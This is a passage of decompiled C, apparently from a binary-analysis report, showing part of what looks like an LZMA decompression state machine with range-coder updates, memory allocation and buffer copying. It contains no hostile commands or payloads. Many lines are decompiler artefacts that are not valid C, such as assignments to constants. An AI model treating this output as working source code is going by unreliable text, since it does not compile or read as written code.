												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
